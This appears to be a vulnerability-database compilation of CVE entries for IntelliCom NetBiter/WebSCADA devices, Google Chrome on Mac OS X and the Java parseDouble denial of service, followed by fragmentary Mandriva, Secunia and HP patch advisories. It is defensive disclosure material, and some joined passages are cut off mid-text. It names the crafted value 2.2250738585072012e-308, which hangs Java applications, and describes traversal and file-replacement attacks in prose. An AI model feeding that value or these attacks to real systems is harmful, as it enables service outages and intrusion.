Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Contains a directory traversal vulnerability
| VAR-201102-0173 | CVE-2010-4732 | WebSCADA Multiple products cgi-bin/read.cgi Remote code execution vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to execute arbitrary code by using a config.html 2.conf action to replace the logo page's GIF image file with a file containing this code, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is A vulnerability that allows arbitrary code execution exists
| VAR-201102-0172 | CVE-2010-4731 | WebSCADA Multiple products cgi-bin/read.cgi Absolute path traversal vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Absolute path traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a full pathname in the file parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is An absolute path traversal vulnerability exists
| VAR-201102-0159 | CVE-2011-0782 | Google Chrome Service disruption in ( Application crash ) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Google Chrome before 9.0.597.84 on Mac OS X does not properly mitigate an unspecified flaw in the Mac OS X 10.5 SSL libraries, which allows remote attackers to cause a denial of service (application crash) via unknown vectors. Google Chrome is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible.
Chrome versions prior to 9.0.597.84 are vulnerable. Google Chrome is a web browser developed by Google (Google)
| VAR-201102-0149 | CVE-2011-0776 | Mac OS X Run on Google Chrome Vulnerability in obtaining important information in sandbox implementation |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The sandbox implementation in Google Chrome before 9.0.597.84 on Mac OS X might allow remote attackers to obtain potentially sensitive information about local files via vectors related to the stat system call. Google Chrome is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible.
Chrome versions prior to 9.0.597.84 are vulnerable. Google Chrome is a web browser developed by Google (Google)
| VAR-201102-0280 | CVE-2010-4476 |
IBM Lotus vulnerable to denial-of-service (DoS)
Related entries in the VARIoT exploits database: VAR-E-201003-0021, VAR-E-201102-0765 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308. IBM Tivoli contains a denial-of-service (DoS) vulnerability. IBM Tivoli contains a denial-of-service (DoS) vulnerability due to an issue in Java Runtime Environment (JRE). A wide range of products are affected. For more information, refer to the vendor's website.A remote attacker may cause a denial-of-service (DoS). Oracle Java is prone to a remote denial-of-service vulnerability.
Successful attacks will cause applications written in Java to hang, creating a denial-of-service condition. Such input strings represent valid
numbers and can be contained in data supplied by an attacker over the
network, leading to a denial-of-service attack. For technical reasons, this update will
be released separately.
For the testing distribution (wheezy) and the unstable distribution
(sid), this problem will be fixed soon. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2011:054
http://www.mandriva.com/security/
_______________________________________________________________________
Package : java-1.6.0-openjdk
Date : March 27, 2011
Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been identified and fixed in
java-1.6.0-openjdk:
The JNLP SecurityManager in IcedTea (IcedTea.so) 1.7 before 1.7.7,
1.8 before 1.8.4, and 1.9 before 1.9.4 for Java OpenJDK returns from
the checkPermission method instead of throwing an exception in certain
circumstances, which might allow context-dependent attackers to bypass
the intended security policy by creating instances of ClassLoader
(CVE-2010-4351). NOTE: the
previous information was obtained from the February 2011 CPU. Oracle
has not commented on claims from a downstream vendor that this issue
involves DNS cache poisoning by untrusted applets. NOTE: the previous information was
obtained from the February 2011 CPU. Oracle has not commented on claims
from a downstream vendor that this issue is an untrusted search path
vulnerability involving an empty LD_LIBRARY_PATH environment variable
(CVE-2010-4450). NOTE: the previous information was obtained from the
February 2011 CPU. Oracle has not commented on claims from a downstream
vendor that this issue is related to the lack of framework support by
AWT event dispatch, and/or clipboard access in Applets. NOTE: the previous information was obtained from
the February 2011 CPU. Oracle has not commented on claims from a
downstream vendor that this issue is heap corruption related to the
Verifier and backward jsrs. NOTE: the previous information
was obtained from the February 2011 CPU. Oracle has not commented on
claims from a downstream vendor that this issue is related to Features
set on SchemaFactory not inherited by Validator. NOTE: the previous information
was obtained from the February 2011 CPU. Oracle has not commented
on claims from a downstream vendor that this issue is related to the
exposure of system properties via vectors related to Font.createFont
and exception text (CVE-2010-4471). NOTE: the previous
information was obtained from the February 2011 CPU. Oracle has
not commented on claims from a downstream vendor that this issue
involves the replacement of the XML DSig Transform or C14N algorithm
implementations.
IcedTea 1.7 before 1.7.8, 1.8 before 1.8.5, and 1.9 before 1.9.5
does not properly verify signatures for JAR files that (1) are
partially signed or (2) signed by multiple entities, which allows
remote attackers to trick users into executing code that appears to
come from a trusted source (CVE-2011-0025).
The JNLPClassLoader class in IcedTea-Web before 1.0.1, as used in
OpenJDK Runtime Environment 1.6.0, allows remote attackers to gain
privileges via unknown vectors related to multiple signers and the
assignment of an inappropriate security descriptor. (CVE-2011-0706)
Additionally the java-1.5.0-gcj packages were not rebuilt with the
shipped version on GCC for 2009.0 and Enterprise Server 5 which
caused problems while building the java-1.6.0-openjdk updates,
therefore rebuilt java-1.5.0-gcj packages are being provided with
this advisory as well.
Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490
The updated packages have been patched to correct this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4448
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4465
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4471
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4472
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4476
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0025
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0706
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2009.0:
cfea90f1f20d28bf5a2f628e0a910eaa 2009.0/i586/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.i586.rpm
d3188bf2f1da126b4d04e920e331d831 2009.0/i586/java-1.5.0-gcj-devel-1.5.0.0-17.1.7.1mdv2009.0.i586.rpm
1b4994018478f335d49531d9d5e60642 2009.0/i586/java-1.5.0-gcj-javadoc-1.5.0.0-17.1.7.1mdv2009.0.i586.rpm
078af1b826c27ea3c7befc88ace7ebd5 2009.0/i586/java-1.5.0-gcj-src-1.5.0.0-17.1.7.1mdv2009.0.i586.rpm
d1c6cba2035f8eada4e351310ebf7be2 2009.0/i586/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
8b53c26f88092819346654a339b44622 2009.0/i586/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
fc8af257ef8db0d37f3bfff954740c0b 2009.0/i586/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
6cd5f5cdb27e4c8936292aef0aa5010c 2009.0/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
03fdab84535710ac263c08b3870cb062 2009.0/i586/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
0232ce60d1d6e1072e50a13f2b416fcc 2009.0/i586/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2009.0.i586.rpm
fc94465e0b7e5fe50095c15726d38699 2009.0/SRPMS/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.src.rpm
79aa73d85fe13e803173a9c520ac1bd8 2009.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64:
5728fe31661213beab52fe97f9af91ad 2009.0/x86_64/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.x86_64.rpm
bd5a2a20d168ddcebe29bb109fea38c2 2009.0/x86_64/java-1.5.0-gcj-devel-1.5.0.0-17.1.7.1mdv2009.0.x86_64.rpm
a37818a53a8dbfa85d82bcf3bf83e08f 2009.0/x86_64/java-1.5.0-gcj-javadoc-1.5.0.0-17.1.7.1mdv2009.0.x86_64.rpm
ed9d1baa365606c512783863da3e0bd8 2009.0/x86_64/java-1.5.0-gcj-src-1.5.0.0-17.1.7.1mdv2009.0.x86_64.rpm
b5e70c75ecc67f8f1f7f22ca55059a8b 2009.0/x86_64/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
071df613e884a9faf3525661280b19d6 2009.0/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
81b79e0a8ae29c5bcff3fa6872ad52e9 2009.0/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
b5818cbad798514f02ee26c346d1e077 2009.0/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
d80e3970d9279df1f9dddd46bcb01380 2009.0/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
d72298b296819ab6791e28449d3cf475 2009.0/x86_64/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2009.0.x86_64.rpm
fc94465e0b7e5fe50095c15726d38699 2009.0/SRPMS/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.src.rpm
79aa73d85fe13e803173a9c520ac1bd8 2009.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2009.0.src.rpm
Mandriva Linux 2010.0:
bbe3a5e4538edd269e8e8c846d02ec50 2010.0/i586/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
825fa39b02a627993df166acad99e002 2010.0/i586/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
b30390e1d4457964f60630c95b36e768 2010.0/i586/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
f6123d9a0852fabdf596850979b58e4d 2010.0/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
f2ec2f80944f1f401154d2fb2c2ad64d 2010.0/i586/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
68ed360de6ee490d80906fd561459faa 2010.0/i586/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2010.0.i586.rpm
f7cb05087b53d464084c1d9975f914b1 2010.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64:
11e65a4c18288572327dd4c4f8841f94 2010.0/x86_64/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
58bdac45685c3146adb44cb2c006811f 2010.0/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
e9dfc0bd42192c92b2a788809226ff27 2010.0/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
afcef69bfa7804c70df2684b2ed19634 2010.0/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
64ea6c5ab1b71b8a0f163aa1f7581c69 2010.0/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
beb768b3e0714331050baf31a8e88bc9 2010.0/x86_64/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2010.0.x86_64.rpm
f7cb05087b53d464084c1d9975f914b1 2010.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.0.src.rpm
Mandriva Linux 2010.1:
c2736e4b08921bb5de8dbad3e13bb988 2010.1/i586/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
884207fa52ea3e168710dfb3988229d5 2010.1/i586/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
a0d0a86bbc5dcc9d2eff2dc2e14ae083 2010.1/i586/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
dc1dd774b5eb1efb1a785b0ff4bc8f94 2010.1/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
41cffbd28ed3d467e465328d8369116a 2010.1/i586/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
ae4064b170d4e2fcd0b4949cd53af79e 2010.1/i586/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2010.2.i586.rpm
f44cc336bcd85dbfd7c589b1b34e1907 2010.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.2.src.rpm
Mandriva Linux 2010.1/X86_64:
556d72a8cf60df24274bb49938a2791c 2010.1/x86_64/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
e7e183d456383ad562cdb9da84e0f899 2010.1/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
035fccb2950b8a87cd4b597c866d5831 2010.1/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
a76c326c10b87a62be32100d0eddd75f 2010.1/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
09ad2b77e3c48b3e16010c8c93fa8f9b 2010.1/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
042beb49ddd872902a8faea3e425b792 2010.1/x86_64/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdv2010.2.x86_64.rpm
f44cc336bcd85dbfd7c589b1b34e1907 2010.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdv2010.2.src.rpm
Mandriva Enterprise Server 5:
2bf537286d1406c491061e07a73c96ec mes5/i586/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdvmes5.2.i586.rpm
fb125806cc547d2c69cf13ae67c835d5 mes5/i586/java-1.5.0-gcj-devel-1.5.0.0-17.1.7.1mdvmes5.2.i586.rpm
657a9fb9b644be8f8a49442a8210d56a mes5/i586/java-1.5.0-gcj-javadoc-1.5.0.0-17.1.7.1mdvmes5.2.i586.rpm
fff64cbf465a2a701c248ad5cc4c89c6 mes5/i586/java-1.5.0-gcj-src-1.5.0.0-17.1.7.1mdvmes5.2.i586.rpm
8ba9fe5adad781d341ba764b661c8c92 mes5/i586/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
75de95d6064fe9d552795deb0768dfca mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
9f5ccbfff9afb405baadfc67f8173617 mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
70de70d7adaccff5397814d31bd51a96 mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
94b138e8a423f2f8c2ad137577bb4d42 mes5/i586/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
fd7dc4b050b6e07ea7686a72c2704ccd mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdvmes5.2.i586.rpm
2899dfa5a7491a13e85736bf588913d9 mes5/SRPMS/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.src.rpm
4fc6e8041b5a93a3a71082fb1cbead26 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64:
11c7cdc078dcd9cf30e818f4fb4c4e1f mes5/x86_64/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdvmes5.2.x86_64.rpm
6c6185f429a1672255e30cf00c2af065 mes5/x86_64/java-1.5.0-gcj-devel-1.5.0.0-17.1.7.1mdvmes5.2.x86_64.rpm
f194361aa7a5cfeec17745f0ee158962 mes5/x86_64/java-1.5.0-gcj-javadoc-1.5.0.0-17.1.7.1mdvmes5.2.x86_64.rpm
7d2679d156a618d7ba847ba2ebcede4b mes5/x86_64/java-1.5.0-gcj-src-1.5.0.0-17.1.7.1mdvmes5.2.x86_64.rpm
8ae3d0065764f69d1546a61b895a4244 mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
8ef4ab6f5f8f421c1b36dfae807350a5 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
d504a7493fc86d5750c849f738bb6167 mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
3c044a087cc5225fd9ad138dcea5fa7d mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
b89fa5785567340525aa5b57c8b9440c mes5/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
3dc504dbf7161b1026bf41298118a819 mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-7.b18.5mdvmes5.2.x86_64.rpm
2899dfa5a7491a13e85736bf588913d9 mes5/SRPMS/java-1.5.0-gcj-1.5.0.0-17.1.7.1mdv2009.0.src.rpm
4fc6e8041b5a93a3a71082fb1cbead26 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-7.b18.5mdvmes5.2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFNj4A1mqjQ0CJFipgRAqd9AKDH+zN9xFfcPlQmGWMRSOqb+xjI4QCfbvvt
DHgr6vgcxh6XXAElZkDBIws=
=7L47
-----END PGP SIGNATURE-----
.
HP OpenVMS running J2SE 1.42 on Alpha platforms: v 1.42-9 and earlier.
HP OpenVMS running J2SE 1.42 on I64 platforms: v 1.42-6 and earlier.
HP OpenVMS running J2SE 5.0 on Alpha platforms: v 1.50-7 and earlier.
HP OpenVMS running J2SE 5.0 on I64 platforms: v 1.50-6 and earlier.
HP OpenVMS running Java SE 6 on Alpha and I64 platforms: v 6.0-2 and earlier.
The FPUpdater tool (Floating Point Updater) must be run to update the Java Development Kit (JDK) and/or the Java Runtime Environment (JRE) for Java v 1.4-x, v 5.0-x, and v 6.0-x. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Sun Java JDK / JRE / SDK "doubleValue()" Denial of Service
Vulnerability
SECUNIA ADVISORY ID:
SA43262
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43262/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43262
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43262/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43262/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43262
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Konstantin Preiber has reported a vulnerability in Sun Java, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
The vulnerability is caused due to an error in the "doubleValue()"
method in FloatingDecimal.java when converting
"2.2250738585072012e-308" from a string type to a double precision
binary floating point and can be exploited to cause an infinite
loop.
* Sun SDK 1.4.2_29 and prior.
SOLUTION:
Apply patch via the FPUpdater tool.
PROVIDED AND/OR DISCOVERED BY:
Konstantin Preiber
ORIGINAL ADVISORY:
Oracle:
http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html
Konstantin Preiber:
http://www.exploringbinary.com/why-volatile-fixes-the-2-2250738585072011e-308-bug/comment-page-1/#comment-4645
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02746026
Version: 2
HPSBMA02642 SSRT100415 rev.2 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows running Java, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2011-04-12
Last Updated: 2011-05-10
Potential Security Impact: Remote Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows running Java. The vulnerability could be remotely exploited to create a Denial of Service (DoS).
References: CVE-2010-4476
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Any version of Java running on HP Network Node Manager i (NNMi) v8.1x and v9.0x for HP-UX, Linux, Solaris, and Windows
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-4476 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made patches available to resolve the vulnerability for NNMi 9.0x
HP has made two methods available to resolve the vulnerability for 8.1x. Customers can request hotfixes or use the FPupdater tool.
For NNMi 9.0x
Operating System
Patch
HP-UX
PHSS_41982 or subsequent
Linux
NNM900L_00004 or subsequent
Solaris
NNM900S_00004 or subsequent
Windows
NNM900W_00004 or subsequent
For NNMi 8.1x
Hotfixes
Customers can request the following hotfixes by contacting the normal HP Services support channel.
NNMi Version
JDK
Hotfix Number
Operating System
NNMi 8.1x
JDK b
QCCR1B87492
HP-UX, Linux, Solaris, Windows
NNMi 8.1x
JDK nnm (nms on Windows)
QCCR1B87491
HP-UX, Linux, Solaris, Windows
FPUpdater (Floating Point Updater)
The FPupdater tool can be used instead of applying hotfixes.
To download the FPUpdater tool, go to https://www.hp.com/go/java then click on the link for the FPUpdater tool
Note: NNMi has two JDKs to be updated. Before running the FPUpdater tool set the shell environment variable JRE_HOME as follows:
NNMi Version
JDK
JRE_HOME for HP-UX, Linux, Solaris
JRE_HOME for Windows
NNMi 8.1x
JDK b
/opt/OV/nonOV/jdk/b/jre
{install_dir}\nonOV\jdk\b\jre
NNMi 8.1x
JDK nnm (nms on Windows)
/opt/OV/nonOV/jdk/nnm/jre
{install_dir}\nonOV\jdk\nms\jre
MANUAL ACTIONS: Yes - Update
For NNMi 8.1x, install the appropriate hotfix or update using FPUpdater
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS (for HP-UX)
For HP-UX NNM v9.x
HP-UX B.11.31
HP-UX B.11.23 (IA)
=============
HPOvNNM.HPNMSJBOSS
action: install PHSS_41982 or subsequent
For HP-UX NNM 8.x
HP-UX B.11.31
HP-UX B.11.23 (IA)
=============
HPOvNNM.HPNMSJBOSS
action: install the appropriate hotfix or update using FPUpdater
END AFFECTED VERSIONS (for HP-UX)
HISTORY
Version:1 (rev.1) - 12 April 2011 Initial release
Version:2 (rev.2) - 10 May 2011 Patches available for NNMi v9.0x
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2011 Hewlett-Packard Development Company, L.P.
